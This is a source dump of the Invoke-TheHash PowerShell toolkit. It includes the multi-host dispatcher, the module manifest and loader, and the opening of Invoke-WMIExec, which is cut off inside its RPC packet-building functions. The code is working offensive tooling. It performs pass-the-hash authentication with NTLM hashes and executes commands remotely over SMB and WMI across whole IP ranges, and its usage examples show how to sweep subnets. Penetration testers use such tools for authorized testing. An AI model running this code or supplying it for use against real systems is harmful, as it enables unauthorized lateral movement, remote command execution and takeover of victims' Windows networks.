├── Invoke-SMBClient.ps1 ├── Invoke-SMBEnum.ps1 ├── Invoke-SMBExec.ps1 ├── Invoke-TheHash.ps1 ├── Invoke-TheHash.psd1 ├── Invoke-TheHash.psm1 ├── Invoke-WMIExec.ps1 ├── LICENSE.md └── README.md /Invoke-TheHash.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-TheHash 2 | { 3 | <# 4 | .SYNOPSIS 5 | Invoke-TheHash has the ability to target multiple hosts with Invoke-SMBExec or Invoke-WMIExec. This function is 6 | primarily for checking a hash against multiple systems. The function can also be used to perform other tasks 7 | against multiple hosts. 8 | 9 | Author: Kevin Robertson (@kevin_robertson) 10 | License: BSD 3-Clause 11 | 12 | .PARAMETER Type 13 | (SMBClient/SMBEnum/SMBExec/WMIExec) Sets the desired Invoke-TheHash function. 14 | 15 | .PARAMETER Target 16 | List of hostnames, IP addresses, CIDR notation, or IP ranges for targets. 17 | 18 | .PARAMETER TargetExclude 19 | List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude form the list or targets. Note that the 20 | format (hostname vs IP address) must match the format used with the Targets parameter. For example, if the host 21 | was added to Targets within a CIDR notation, it must be excluded as an IP address and not a host name. 22 | 23 | .PARAMETER PortCheckDisable 24 | (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up 25 | the function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. 26 | 27 | .PARAMETER PortCheckTimeout 28 | Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. 29 | 30 | .PARAMETER Username 31 | Username to use for authentication. 32 | 33 | .PARAMETER Domain 34 | Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 35 | 36 | .PARAMETER Hash 37 | NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. 38 | 39 | .PARAMETER Command 40 | Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. 41 | 42 | .PARAMETER CommandCOMSPEC 43 | Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. 44 | 45 | .PARAMETER Action 46 | (All,Group,NetSession,Share,User) Default = Share: SMBEnum enumeration action to perform. 47 | 48 | .PARAMETER Group 49 | Default = Administrators: Group to enumerate with SMBEnum. 50 | 51 | .PARAMETER Service 52 | Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. 53 | 54 | .PARAMETER Sleep 55 | Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this 56 | setting if you are experiencing strange results. 57 | 58 | .EXAMPLE 59 | Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 60 | 61 | .EXAMPLE 62 | Invoke-TheHash -Type SMBExec -Target 192.168.100.1-100 -TargetExclude 192.168.100.50 -Username user1 -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -domain test 63 | 64 | .LINK 65 | https://github.com/Kevin-Robertson/Invoke-TheHash 66 | 67 | #> 68 | [CmdletBinding(DefaultParametersetName='Default')] 69 | param 70 | ( 71 | [parameter(Mandatory=$true)][Array]$Target, 72 | [parameter(Mandatory=$false)][Array]$TargetExclude, 73 | [parameter(ParameterSetName='Auth',Mandatory=$true)][String]$Username, 74 | [parameter(ParameterSetName='Auth',Mandatory=$false)][String]$Domain, 75 | [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Action = "All", 76 | [parameter(Mandatory=$false)][String]$Group = "Administrators", 77 | [parameter(Mandatory=$false)][String]$Service, 78 | [parameter(Mandatory=$false)][String]$Command, 79 | [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", 80 | [parameter(Mandatory=$true)][ValidateSet("SMBClient","SMBEnum","SMBExec","WMIExec")][String]$Type, 81 | [parameter(Mandatory=$false)][Int]$PortCheckTimeout = 100, 82 | [parameter(ParameterSetName='Auth',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, 83 | [parameter(Mandatory=$false)][Switch]$PortCheckDisable, 84 | [parameter(Mandatory=$false)][Int]$Sleep 85 | ) 86 | 87 | $target_list = New-Object System.Collections.ArrayList 88 | $target_exclude_list = New-Object System.Collections.ArrayList 89 | 90 | if($Type -eq 'WMIExec') 91 | { 92 | $Sleep = 10 93 | } 94 | else 95 | { 96 | $Sleep = 150 97 | } 98 | 99 | for($i=0;$i -lt $target.Count;$i++) 100 | { 101 | 102 | if($target[$i] -like "*-*") 103 | { 104 | $target_array = $target[$i].split("-") 105 | 106 | if($target_array[0] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" -and 107 | $target_array[1] -notmatch "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b") 108 | { 109 | 110 | if($target_array.Count -ne 2 -or $target_array[1] -notmatch "^[\d]+$" -or $target_array[1] -gt 254) 111 | { 112 | Write-Output "[!] Invalid target $($target[$i])" 113 | throw 114 | } 115 | else 116 | { 117 | $IP_network_begin = $target_array[0].ToCharArray() 118 | [Array]::Reverse($IP_network_begin) 119 | $IP_network_begin = -join($IP_network_begin) 120 | $IP_network_begin = $IP_network_begin.SubString($IP_network_begin.IndexOf(".")) 121 | $IP_network_begin = $IP_network_begin.ToCharArray() 122 | [Array]::Reverse($IP_network_begin) 123 | $IP_network_begin = -join($IP_network_begin) 124 | $IP_range_end = $IP_network_begin + $target_array[1] 125 | $target[$i] = $target_array[0] + "-" + $IP_range_end 126 | } 127 | 128 | } 129 | 130 | } 131 | 132 | } 133 | 134 | # math taken from https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b 135 | 136 | function Convert-RangetoIPList 137 | { 138 | param($IP,$CIDR,$Start,$End) 139 | 140 | function Convert-IPtoINT64 141 | { 142 | param($IP) 143 | 144 | $octets = $IP.split(".") 145 | 146 | return [int64]([int64]$octets[0] * 16777216 + [int64]$octets[1]*65536 + [int64]$octets[2] * 256 + [int64]$octets[3]) 147 | } 148 | 149 | function Convert-INT64toIP 150 | { 151 | param ([int64]$int) 152 | return (([math]::truncate($int/16777216)).tostring() + "." +([math]::truncate(($int%16777216)/65536)).tostring() + "." + ([math]::truncate(($int%65536)/256)).tostring() + "." +([math]::truncate($int%256)).tostring()) 153 | } 154 | 155 | $target_list = New-Object System.Collections.ArrayList 156 | 157 | if($IP) 158 | { 159 | $IP_address = [System.Net.IPAddress]::Parse($IP) 160 | } 161 | 162 | if($CIDR) 163 | { 164 | $mask_address = [System.Net.IPAddress]::Parse((Convert-INT64toIP -int ([convert]::ToInt64(("1" * $CIDR + "0" * (32 - $CIDR)),2)))) 165 | } 166 | 167 | if($IP) 168 | { 169 | $network_address = New-Object System.Net.IPAddress ($mask_address.address -band $IP_address.address) 170 | } 171 | 172 | if($IP) 173 | { 174 | $broadcast_address = New-Object System.Net.IPAddress (([System.Net.IPAddress]::parse("255.255.255.255").address -bxor $mask_address.address -bor $network_address.address)) 175 | } 176 | 177 | if($IP) 178 | { 179 | $start_address = Convert-IPtoINT64 -ip $network_address.IPAddressToString 180 | $end_address = Convert-IPtoINT64 -ip $broadcast_address.IPAddressToString 181 | } 182 | else 183 | { 184 | $start_address = Convert-IPtoINT64 -ip $start 185 | $end_address = Convert-IPtoINT64 -ip $end 186 | } 187 | 188 | for($i = $start_address; $i -le $end_address; $i++) 189 | { 190 | $IP_address = Convert-INT64toIP -int $i 191 | $target_list.Add($IP_address) > $null 192 | } 193 | 194 | if($network_address) 195 | { 196 | $target_list.Remove($network_address.IPAddressToString) 197 | } 198 | 199 | if($broadcast_address) 200 | { 201 | $target_list.Remove($broadcast_address.IPAddressToString) 202 | } 203 | 204 | return $target_list 205 | } 206 | 207 | function Get-TargetList 208 | { 209 | param($targets) 210 | 211 | $target_list = New-Object System.Collections.ArrayList 212 | 213 | ForEach($entry in $targets) 214 | { 215 | $entry_split = $null 216 | 217 | if($entry.contains("/")) 218 | { 219 | $entry_split = $entry.Split("/") 220 | $IP = $entry_split[0] 221 | $CIDR = $entry_split[1] 222 | $target_list.AddRange($(Convert-RangetoIPList -IP $IP -CIDR $CIDR)) 223 | } 224 | elseif($entry.contains("-")) 225 | { 226 | $entry_split = $entry.Split("-") 227 | 228 | if($entry_split[0] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" -and 229 | $entry_split[1] -match "\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b") 230 | { 231 | $start_address = $entry_split[0] 232 | $end_address = $entry_split[1] 233 | $target_list.AddRange($(Convert-RangetoIPList -Start $start_address -End $end_address)) 234 | } 235 | else 236 | { 237 | $target_list.Add($entry) > $null 238 | } 239 | 240 | } 241 | else 242 | { 243 | $target_list.Add($entry) > $null 244 | } 245 | 246 | } 247 | 248 | return $target_list 249 | } 250 | 251 | [Array]$target_list = Get-TargetList $Target 252 | 253 | if($TargetExclude) 254 | { 255 | $target_exclude_list = Get-TargetList $TargetExclude 256 | $target_list = Compare-Object -ReferenceObject $target_exclude_list -DifferenceObject $target_list -PassThru 257 | } 258 | 259 | if($target_list.Count -gt 0) 260 | { 261 | 262 | foreach($target_host in $target_list) 263 | { 264 | Write-Verbose "[*] Targeting $target_host" 265 | 266 | if($type -eq 'WMIExec') 267 | { 268 | 269 | if(!$PortCheckDisable) 270 | { 271 | $WMI_port_test = New-Object System.Net.Sockets.TCPClient 272 | $WMI_port_test_result = $WMI_port_test.BeginConnect($target_host,"135",$null,$null) 273 | $WMI_port_test_success = $WMI_port_test_result.AsyncWaitHandle.WaitOne($PortCheckTimeout,$false) 274 | $WMI_port_test.Close() 275 | } 276 | 277 | if($WMI_port_test_success -or $PortCheckDisable) 278 | { 279 | Invoke-WMIExec -username $Username -domain $Domain -hash $Hash -command $Command -target $target_host -sleep $Sleep -Verbose:$VerbosePreference 280 | } 281 | 282 | } 283 | elseif($Type -like 'SMB*') 284 | { 285 | 286 | if(!$PortCheckDisable) 287 | { 288 | $SMB_port_test = New-Object System.Net.Sockets.TCPClient 289 | $SMB_port_test_result = $SMB_port_test.BeginConnect($target_host,"445",$null,$null) 290 | $SMB_port_test_success = $SMB_port_test_result.AsyncWaitHandle.WaitOne($PortCheckTimeout,$false) 291 | $SMB_port_test.Close() 292 | } 293 | 294 | if($SMB_port_test_success -or $PortCheckDisable) 295 | { 296 | 297 | switch($Type) 298 | { 299 | 300 | 'SMBClient' 301 | { 302 | 303 | $source = "\\" + $target_host + "\c$" 304 | 305 | if($PsCmdlet.ParameterSetName -eq 'Auth') 306 | { 307 | Invoke-SMBClient -username $Username -domain $Domain -hash $Hash -source $source -sleep $Sleep -Verbose:$VerbosePreference 308 | } 309 | else 310 | { 311 | Invoke-SMBClient -source $source -sleep $Sleep -Verbose:$VerbosePreference 312 | } 313 | 314 | } 315 | 316 | 'SMBEnum' 317 | { 318 | 319 | if($PsCmdlet.ParameterSetName -eq 'Auth') 320 | { 321 | Invoke-SMBEnum -username $Username -domain $Domain -hash $Hash -target $target_host -sleep $Sleep -Action $Action -TargetShow -Verbose:$VerbosePreference 322 | } 323 | else 324 | { 325 | Invoke-SMBEnum -target $target_host -sleep $Sleep -Verbose:$VerbosePreference 326 | } 327 | 328 | } 329 | 330 | 'SMBExec' 331 | { 332 | 333 | if($PsCmdlet.ParameterSetName -eq 'Auth') 334 | { 335 | Invoke-SMBExec -username $Username -domain $Domain -hash $Hash -command $Command -CommandCOMSPEC $CommandCOMSPEC -Service $Service -target $target_host -sleep $Sleep -Verbose:$VerbosePreference 336 | } 337 | else 338 | { 339 | Invoke-SMBExec -target $target_host -sleep $Sleep -Verbose:$VerbosePreference 340 | } 341 | 342 | } 343 | 344 | } 345 | 346 | } 347 | 348 | } 349 | 350 | } 351 | 352 | } 353 | else 354 | { 355 | Write-Output "[-] Target list is empty" 356 | } 357 | 358 | } 359 | -------------------------------------------------------------------------------- /Invoke-TheHash.psd1: -------------------------------------------------------------------------------- 1 | # 2 | # Module manifest for module 'Invoke-TheHash' 3 | # 4 | # Generated by: Kevin Robertson 5 | # 6 | # Generated on: 12/27/2016 7 | # 8 | 9 | @{ 10 | 11 | # Script module or binary module file associated with this manifest 12 | ModuleToProcess = 'Invoke-TheHash.psm1' 13 | 14 | # Version number of this module. 15 | ModuleVersion = '1.0' 16 | 17 | # ID used to uniquely identify this module 18 | GUID = '6474447f-2a69-4690-909e-2e10b4859baa' 19 | 20 | # Author of this module 21 | Author = 'Kevin Robertson' 22 | 23 | # Company or vendor of this module 24 | CompanyName = '' 25 | 26 | # Copyright statement for this module 27 | Copyright = 'BSD 3-Clause' 28 | 29 | # Description of the functionality provided by this module 30 | Description = 'Invoke-TheHash - PowerShell Pass The Hash Utils' 31 | 32 | # Minimum version of the Windows PowerShell engine required by this module 33 | PowerShellVersion = '2.0' 34 | 35 | # Name of the Windows PowerShell host required by this module 36 | PowerShellHostName = '' 37 | 38 | # Minimum version of the Windows PowerShell host required by this module 39 | PowerShellHostVersion = '' 40 | 41 | # Minimum version of the .NET Framework required by this module 42 | DotNetFrameworkVersion = '' 43 | 44 | # Minimum version of the common language runtime (CLR) required by this module 45 | CLRVersion = '' 46 | 47 | # Processor architecture (None, X86, Amd64, IA64) required by this module 48 | ProcessorArchitecture = '' 49 | 50 | # Modules that must be imported into the global environment prior to importing this module 51 | RequiredModules = @() 52 | 53 | # Assemblies that must be loaded prior to importing this module 54 | RequiredAssemblies = @() 55 | 56 | # Script files (.ps1) that are run in the caller's environment prior to importing this module 57 | ScriptsToProcess = @() 58 | 59 | # Type files (.ps1xml) to be loaded when importing this module 60 | TypesToProcess = @() 61 | 62 | # Format files (.ps1xml) to be loaded when importing this module 63 | FormatsToProcess = @() 64 | 65 | # Modules to import as nested modules of the module specified in ModuleToProcess 66 | NestedModules = @() 67 | 68 | # Functions to export from this module 69 | FunctionsToExport = '*' 70 | 71 | # Cmdlets to export from this module 72 | CmdletsToExport = '*' 73 | 74 | # Variables to export from this module 75 | VariablesToExport = '*' 76 | 77 | # Aliases to export from this module 78 | AliasesToExport = '*' 79 | 80 | # List of all modules packaged with this module 81 | ModuleList = @() 82 | 83 | # List of all files packaged with this module 84 | FileList = @() 85 | 86 | # Private data to pass to the module specified in ModuleToProcess 87 | PrivateData = '' 88 | 89 | } 90 | 91 | -------------------------------------------------------------------------------- /Invoke-TheHash.psm1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | Invoke-TheHash - PowerShell Pass The Hash Utils 4 | 5 | .LINK 6 | https://github.com/Kevin-Robertson/Invoke-TheHash 7 | #> 8 | Import-Module $PWD\Invoke-TheHash.ps1 9 | Import-Module $PWD\Invoke-SMBClient.ps1 10 | Import-Module $PWD\Invoke-SMBEnum.ps1 11 | Import-Module $PWD\Invoke-SMBExec.ps1 12 | Import-Module $PWD\Invoke-WMIExec.ps1 -------------------------------------------------------------------------------- /Invoke-WMIExec.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-WMIExec 2 | { 3 | <# 4 | .SYNOPSIS 5 | Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. 6 | 7 | Author: Kevin Robertson (@kevin_robertson) 8 | License: BSD 3-Clause 9 | 10 | .PARAMETER Target 11 | Hostname or IP address of target. 12 | 13 | .PARAMETER Username 14 | Username to use for authentication. 15 | 16 | .PARAMETER Domain 17 | Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after 18 | the username. 19 | 20 | .PARAMETER Hash 21 | NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. 22 | 23 | .PARAMETER Command 24 | Command to execute on the target. If a command is not specified, the function will just check to see if the 25 | username and hash has access to WMI on the target. 26 | 27 | .PARAMETER Sleep 28 | Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this 29 | setting if you are experiencing strange results. 30 | 31 | .EXAMPLE 32 | Execute a command. 33 | Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose 34 | 35 | .EXAMPLE 36 | Check command execution privilege. 37 | Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 38 | 39 | .LINK 40 | https://github.com/Kevin-Robertson/Invoke-TheHash 41 | 42 | #> 43 | [CmdletBinding()] 44 | param 45 | ( 46 | [parameter(Mandatory=$true)][String]$Target, 47 | [parameter(Mandatory=$true)][String]$Username, 48 | [parameter(Mandatory=$false)][String]$Domain, 49 | [parameter(Mandatory=$false)][String]$Command, 50 | [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, 51 | [parameter(Mandatory=$false)][Int]$Sleep=10 52 | ) 53 | 54 | if($Command) 55 | { 56 | $WMI_execute = $true 57 | } 58 | 59 | function ConvertFrom-PacketOrderedDictionary 60 | { 61 | param($packet_ordered_dictionary) 62 | 63 | ForEach($field in $packet_ordered_dictionary.Values) 64 | { 65 | $byte_array += $field 66 | } 67 | 68 | return $byte_array 69 | } 70 | 71 | #RPC 72 | 73 | function New-PacketRPCBind 74 | { 75 | param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) 76 | 77 | [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) 78 | 79 | $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary 80 | $packet_RPCBind.Add("Version",[Byte[]](0x05)) 81 | $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) 82 | $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) 83 | $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) 84 | $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 85 | $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) 86 | $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) 87 | $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) 88 | $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) 89 | $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) 90 | $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) 91 | $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) 92 | $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) 93 | $packet_RPCBind.Add("ContextID",$packet_context_ID) 94 | $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) 95 | $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) 96 | $packet_RPCBind.Add("Interface",$packet_UUID) 97 | $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) 98 | $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) 99 | $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) 100 | $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) 101 | 102 | if($packet_num_ctx_items[0] -eq 2) 103 | { 104 | $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) 105 | $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) 106 | $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) 107 | $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) 108 | $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) 109 | $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) 110 | $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 111 | $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) 112 | } 113 | elseif($packet_num_ctx_items[0] -eq 3) 114 | { 115 | $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) 116 | $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) 117 | $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) 118 | $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 119 | $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) 120 | $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) 121 | $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) 122 | $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) 123 | $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) 124 | $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) 125 | $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) 126 | $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 127 | $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) 128 | $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) 129 | $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 130 | $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) 131 | $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) 132 | $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) 133 | $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) 134 | $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) 135 | $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) 136 | $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) 137 | $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) 138 | $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) 139 | $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 140 | $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 141 | $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) 142 | } 143 | 144 | if($packet_call_ID -eq 3) 145 | { 146 | $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) 147 | $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) 148 | $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) 149 | $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) 150 | $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) 151 | $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) 152 | $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) 153 | $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) 154 | $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 155 | $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 156 | $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) 157 | } 158 | 159 | return $packet_RPCBind 160 | } 161 | 162 | function New-PacketRPCAUTH3 163 | { 164 | param([Byte[]]$packet_NTLMSSP) 165 | 166 | [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] 167 | [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] 168 | 169 | $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary 170 | $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) 171 | $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) 172 | $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) 173 | $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) 174 | $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 175 | $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) 176 | $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) 177 | $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) 178 | $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) 179 | $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) 180 | $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) 181 | $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) 182 | $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) 183 | $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) 184 | $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) 185 | $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) 186 | 187 | return $packet_RPCAuth3 188 | } 189 | 190 | function New-PacketRPCRequest 191 | { 192 | param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) 193 | 194 | if($packet_auth_length -gt 0) 195 | { 196 | $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 197 | } 198 | 199 | [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) 200 | [Byte[]]$packet_frag_length = $packet_write_length[0,1] 201 | [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) 202 | [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] 203 | 204 | $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary 205 | $packet_RPCRequest.Add("Version",[Byte[]](0x05)) 206 | $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) 207 | $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) 208 | $packet_RPCRequest.Add("PacketFlags",$packet_flags) 209 | $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 210 | $packet_RPCRequest.Add("FragLength",$packet_frag_length) 211 | $packet_RPCRequest.Add("AuthLength",$packet_auth_length) 212 | $packet_RPCRequest.Add("CallID",$packet_call_ID) 213 | $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) 214 | $packet_RPCRequest.Add("ContextID",$packet_context_ID) 215 | $packet_RPCRequest.Add("Opnum",$packet_opnum) 216 | 217 | if($packet_data.Length) 218 | { 219 | $packet_RPCRequest.Add("Data",$packet_data) 220 | } 221 | 222 | return $packet_RPCRequest 223 | } 224 | 225 | function New-PacketRPCAlterContext 226 | { 227 | param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) 228 | 229 | $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary 230 | $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) 231 | $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) 232 | $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) 233 | $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) 234 | $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 235 | $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) 236 | $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) 237 | $packet_RPCAlterContext.Add("CallID",$packet_call_ID) 238 | $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) 239 | $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) 240 | $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) 241 | 